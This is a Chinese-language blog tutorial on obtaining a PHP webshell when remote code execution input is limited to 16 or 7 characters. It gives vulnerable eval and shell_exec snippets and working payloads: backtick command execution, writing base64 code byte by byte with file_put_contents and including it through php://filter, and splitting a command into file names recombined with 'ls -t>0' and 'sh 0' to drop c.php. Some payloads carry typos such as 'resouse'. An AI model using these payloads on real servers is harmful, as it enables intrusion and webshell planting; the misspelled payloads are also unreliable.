RCE之突破长度限制

我们在写webshell时通常会遇到过滤,但除了过滤之外还可能会有长度限制,这里就简单说一下关于RCE突破长度限制的技巧

突破16位

例如:PHP Eval函数参数限制在16个字符的情况下 ,如何拿到Webshell?

php 复制代码
<?php
$param = $_REQUEST['param']; 
if (strlen($param) < 17 && stripos($param, 'eval') === false && stripos($param, 'assert') === false) 
{
    eval($param);
}

常规写法基本上是param=eval(_POST\[0\]);或者param=_GET[0]($_POST[1]);&0=assert&1=??

但这里过滤了eval和assert,第二种写法是绕过了waf,但长度超过了16位,也不行。

反引号

但我们知道,在linux下,反引号是可以执行命令的,所以是否可以用`$_GET[1]`作为payload?

测试成功

这种方法很简单,那有没有其他方法也可以突破限制呢?

本地文件包含

使用文件包含的方法,param=include$_GET[1];16个字符,刚好符合,但难点来了,我们要包含的文件在哪?

使用file_put_contents(N,p,8)

在php官网中可以看到file_put_contents第一个参数是文件名,第二个参数是要传入的值,第三个参数是flag,8表示向文件中追加.

所以我们使用file_put_contents将webshell进行base64编码后写入文件中,在文件包含这个文件,不就可以执行了?

那为什么要进行base64编码呢?因为filr_put_contents无法对一些特殊字符进行追加,所以这里需要进行base64的编码

上传写入文件

这里写一个<?php phpinfo();

编码之后PD9waHAgcGhwaW5mbygpOw==,因为param有长度限制,所以只能一位一位的写入

复制代码
?param=$_GET[1](N,P,8);&1=file_put_contents
?param=$_GET[1](N,D,8);&1=file_put_contents
...

写入成功

包含执行

因为写入的是base64编码的值,无法直接执行,可以使用php://fileter伪协议对文件解码后执行

复制代码
payload=?param=include$_GET[1]&1=php://filter/read=convert.base64-decode/resouse=N

这种方法利用难度较高,但过程是非常巧妙的

突破7位

php 复制代码
<?php
$param = $_REQUEST['param']; 
if( strlen($param) < 8 ) 
{ 
    echo shell_exec($param);
}

这种情况怎么办,之前最短的方法`$_GET[1]`也有10位,将webshell写入文件就更不行了,无法突破?

文件名组合

linux创建文件:

touch vim > +文件名等

那是否可以将webshell拆开放在文件名里,之后将文件名组合到一个新的文件中然后执行?

我们创建最后执行的文件命令:

bash 复制代码
 echo PD9waHAgcGhwaW5mbygpOw| base64 -d>c.php

因为含有特殊字符无法创建文件,所以这里任然需要使用base64编码

怎么组合?

ls -t 以创建时间来列出当前目录下所有文件,所以可以通过这种方式来组合,但创建文件时需要从后往前创建,同时文件列表是通过\n换行符分割的,所以我们文件名最后需要加上\\来转义

将上面的这条命令拆开创建成文件

bash 复制代码
?param=%3Ehp
?param=%3Ec.p\\
?param=%3Ed\>\\
?param=%3E\ -\\
?param=%3Ee64\\
?param=%3Ebas\\
...

文件创建成功

bash 复制代码
?param=ls -t>0
?param=sh 0

组合成文件0,并运行

成功创建c.php

直接访问c.php

成功突破7位限制

相关推荐
Lowjin_4 小时前
计算机网络-RIP协议
网络·计算机网络·智能路由器
半夏知半秋4 小时前
skynet-socket.lua源码分析
服务器·开发语言·学习·架构·lua
问道飞鱼6 小时前
【数据库知识】TxSQL 主从数据库同步底层原理深度解析
网络·数据库·半同步复制·txsql
swaveye90607 小时前
轻量服务器创建mysql,并配置远程连接
服务器·mysql·adb
lypzcgf7 小时前
Coze源码分析-资源库-编辑插件-后端源码-安全与错误处理
安全·插件·coze·coze源码分析·智能体平台·ai应用平台·agent平台
A-刘晨阳8 小时前
Linux安装centos8及基础配置
linux·运维·服务器·操作系统·centos8
粟悟饭&龟波功8 小时前
【网络安全】一、入门篇:读懂 HTTP 协议
安全·web安全·http
骥龙8 小时前
粤港澳全运会网络安全防御体系深度解析:威胁态势与实战防护
网络·安全·web安全
漫谈网络8 小时前
InfiniBand 深度解析
网络·rdma·infiniband·roce v2
海域云赵从友9 小时前
从直播卡顿到流畅带货:SD-WAN网络专线如何优化阿联酋TikTok体验?
网络